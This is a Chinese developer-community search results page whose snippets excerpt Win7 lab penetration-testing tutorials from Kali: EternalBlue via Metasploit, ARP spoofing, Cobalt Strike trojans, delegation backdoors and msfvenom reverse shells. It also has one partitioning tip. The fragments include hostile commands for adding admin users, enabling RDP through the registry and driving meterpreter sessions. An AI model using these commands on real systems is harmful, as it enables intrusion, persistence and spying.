首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

win7创建逻辑分区

在win98下面创建主DOS分区和逻辑分区都很容易,到了XP的时候,系统会保留一个8M左右的保留空间。到了win7,干脆多了个100M的保留空间。在分区的时候,win系统都无法对保留分区进行操作。...而win7却无法直接创建逻辑分区。创建的都是主分区和扩展分区。如何解决这个问题?办法如下: 1、首先创建一个系统分区。然后剩下的分区大小不要操作了。...5、执行创建逻辑分区命令:create partition extended  回车执行命令后,系统会将剩余空间完整的创建成一个扩展分区。 6、最后在逻辑分区中创建简单卷就可以了。...创建逻辑分区命令均不能生效。必须删除多余的分区。然后重新执行上面的命令

1.4K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Kali从入门到银手镯(三):利用Metasploit工具的Win7渗透测试

    现在很多用户还在使用Win7系统,虽然我个人也非常喜欢Win7,也承认这是一款非常经典的系统。但是Win7已经在今年1月份彻底停止了支持,也就是说永远也不会得到安全更新和补丁修复了。...今天就来看看如何利用Kali来对Win7进行渗透。这里使用的工具是大名鼎鼎的Metaspoit,集成了大量漏洞渗透工具。...准备工作 准备工作很简单,一个Win7虚拟机和一个Kali虚拟机即可。为了让Kali能够成功渗透,Win7系统需要关闭防火墙。 ? 扫描漏洞 首先在Kali里启动Metasploit框架。...其中RHOSTS是远程IP,也就是Win7的IP地址,而LHOSTS是本地Kali系统的IP地址。...开启RDP的时候需要创建一个用户。

    2.6K20

    实战|记一次对钓鱼网站的实验

    本实验实现3:在kali控制win7后,实现创建用户的操作。 在VMware上建立两个虚拟机:win7kali。...靶机:Win7 64位 (IP: 192.168.10.45)--用ipconfig进行查询。 攻击机:Kali (IP:192.168.10.21)--用ifconfig进行查询。...保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)。...结果2:由于在win7中触发打开了网址链接,那么,在kali中,则会触发会话连接,结果显示了是192.168.10.45(目标主机win7)尝试点击了该网站链接,于是,kali利用MS14-064漏洞模块对目标主机发起了攻击...>net user test1 /add 结果1:在kali中,若结果显示“the commad completed successfully”—代表“命令执行成功” ,用户创建成功 ; 若结果显示“system

    1.5K40

    内网渗透 | 利用委派打造隐蔽后门(权限维持)

    目录 选择控制的用户 已经存在的有SPN的域用户 自己创建的机器账号 自己创建的域用户然后赋予SPN 利用约束性委派打造隐蔽后门(权限维持) 利用基于资源的约束委派打造隐蔽后门(权限维持) 在Kali上使用...自己创建的域用户然后赋予SPN 我们还可以自己创建一个域用户,然后赋予SPN 利用约束性委派打造隐蔽后门(权限维持) 我们控制的用户选择的是自己创建的 test 域用户。...· 域控:win2008 192.168.10.131 · 域:xie.com · 攻击机:Kali 首先修改 kali 的/etc/hosts/文件,添加如下内容 192.168.10.131 win2008...在Kali上进行攻击 ..../wmiexec.py -no-pass -k administrator@win2012 -dc-ip 192.168.10.24 在Win7上使用Rubeus进行攻击 现在我们在Win7上用普通域用户

    1K00

    kali装电脑_Kali安装教程(Windows7和kali双系统安装教程)

    Kali安装教程 (一) Windows7+kali双系统安装准备 先安装win7,然后安装kali,并且kali的引导项安装在/boot分区而不安装MBR中,因为这样的话就算重装win7kali系统经过简单引导仍然可以使用...Win7的安装此处就不在赘述,现在只聊一聊kali的安装。 注:教程中个别截图借用了网上某人热心童鞋的截图,在此表示感谢!!...1) 准备阶段 准备4G的优盘一个; 刻录工具为: unetbootin-windows-latest.exe 或者 Win32DiskImager-0.9.5 系统为: kali-linux-1.0.4...-i386.iso 或者 kali-linux-2.0-amd64.iso 最好压缩出30个G以上的未格式化磁盘空间,教程找度娘 注: 本人最初使用 unetbootin-windows-latest.exe...刻录启动盘,无奈总是无法加载安装盘,最后搞得我只好重装Win7,然后使用Win32DiskImager-0.9.5进行刻录,最后成功!!

    3.3K10

    KaLi 对 windows7的永恒之蓝漏洞的利用

    KaLi 对 windows7的永恒之蓝漏洞的利用 1. 首先我们要知道window7的IP地址,cmd中输入ipconfig中得知 2....打开kali的终端,看看能不能ping通win7的ip 如下图就是没得问题了 3....Kali终端中打开msfc,search ms17_010 输入msfconsole出现如图,每次加载都是不一样的图片哦!!...,现在我们来挨个实现我们的操作: (1)我们先来控制一下win7的摄像头,指令如下: webcam_stream 也许这个时候会报错,那说明你的win7摄像头没有,如何确定自己win7的摄像头开了呢,...(2)拿shell 指令就一句话 shell 第二个红框内就是win7的cmd,我们通过这个来看一下win7的ip地址 (3)截图 先退出win7的cmd后我们输入 输入指令后kali界面就会跳出一个截图

    34610

    渗透测试实战-漏洞利用MS17-010

    实验环境 VMware 版本是17 kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4 win7系统,IP:192.168.242.6...kaliwin7系统如果没有,在文末有获取方式,用VMware打开到kaliwin7系统目录下,会看到文件后缀是.vmx直接打开即可,会提示虚拟机已经移动相关的提示,选择复制的那个选项打开。...确定可ping通 确定目标win7系统,与kali同一个局域网的主机,kali可ping通win7系统的ip # ping 请求2次 ping 192.168.242.6 -c 2 # ping 结果是通的...注意:由于kali默认登录的kali账户需要切换管理员权限 # 切换管理员权限,需要输入密码 sudo su # 输入正确密码后,切换成功 ┌──(rootkali)-[/home/kali] └─#...系统的当前目录下 meterpreter > screenshot Screenshot saved to: /home/kali/nOPlvAsc.jpeg # 上传文件 到win7系统,注意目录必须是存在的

    7610

    Web安全班作业 | WireShark抓包ARP报文分析并实施ARP中间人攻击

    并刷新arp表,但是这时候主机kali(192.168.0.100)回应说自己就是192.168.0.1,并将mac返回给win7 并刷新arp表,win7的arp里对应信息为这样 192.168.0.1...-------kali(192.168.0.100)的mac,得到了网关的mac后就开始传输真正的数据了,数据包封装上 源(win7)mac 目的为网关mac(实际是kali的mac), 交换机是这样转发...kali,这就是一个欺骗。...kali不仅仅欺骗kali,它还会欺骗网关,说自己就是win7。...到这里arp攻击完成,返回win7查看攻击情况。 查看arp表可以发现,kali的mac地址和网关的mac地址相同,说明至此攻击完成。 我们可以通过ettercap查看嗅探受害者访问流量。

    1.9K10

    渗透测试实战-CS工具使用

    2、搭建cs服务器 2.1、实验环境 kali-linux系统,IP:192.168.242.4 win7系统,IP:192.168.242.6 2.2、复制并解压cs包 可以先在自己本机上解压cobal_strike...在win7系统访问:http://192.168.242.4:80/ ,并输入内容 kali系统查看web日志 4、生成木马进行后渗透 4.1、生成windows可执行程序 操作步骤:选择攻击模块--生成后门...先把上面制作的木马程序复制到本机,再复制到win7系统,然后双击木马,然后CS就会显示上线了。...另外一种方式:就是利用win7漏洞ms17-010攻击,然后使用upload命令上传到win7系统。...win7系统看任务管理器已经有运行木马程序了 4.5、kali系统出现靶机 kali系统的CS-web日志,增加记录,在列表出现靶机 4.5.1、与靶机命令交互 右键点击上线的靶机,选择会话交互,进入命令模式

    11410

    利用ms17_010开启3389端口

    攻击机kali 目标机win7 sp1(旗舰版) 当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块 use auxiliary/scanner...然后我们创建用户名密码 blue/blue net user blue blue /add 将用户blue添加入管理组 (不加入会连接不上) net localgroup administrators...SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali...远程桌面连接Win7 rdesktop 192.168.194.129:3389(不在msf中执行) 这里连接会在目标机器上得到提示,如果不管的话30秒后将默认选择确定断开 ?...但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接),复现要将win7

    3.4K40

    MSF恶意程序利用【实战】

    注意权限信息 5、安装防病毒软件 6、不要在未知安全性的WIFI网络中上网 7、及时止损 8、及时举报 2、MSF恶意程序利用 2.0、说明 因为手机恶意程序利用的实验,我自己没有验证过就暂不做分享,以win7...系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4 win7系统,IP:192.168.242.6 2.1.2.2、生成后门软件 在kali系统生成后门软件...,然后先复制到外面(本机),再复制到目标系统win7 msfvenom -p 添加载荷payload LHOST=监听的IP LPORT=监听的端口,只要不占用即可 -f 输出文件格式 > 目标文件的名称...的IP msf6 exploit(multi/handler) > set lhost kali的ip #设置kali的端口lport =6060,也就是生成后门的端口 msf6 exploit(multi...系统双击后门软件 win7系统双击后门软件,然后观察kali系统会看到有对应信息串联起来,效果如下 [*] Sending stage (175174 bytes) to 192.168.242.6 [

    8910
    领券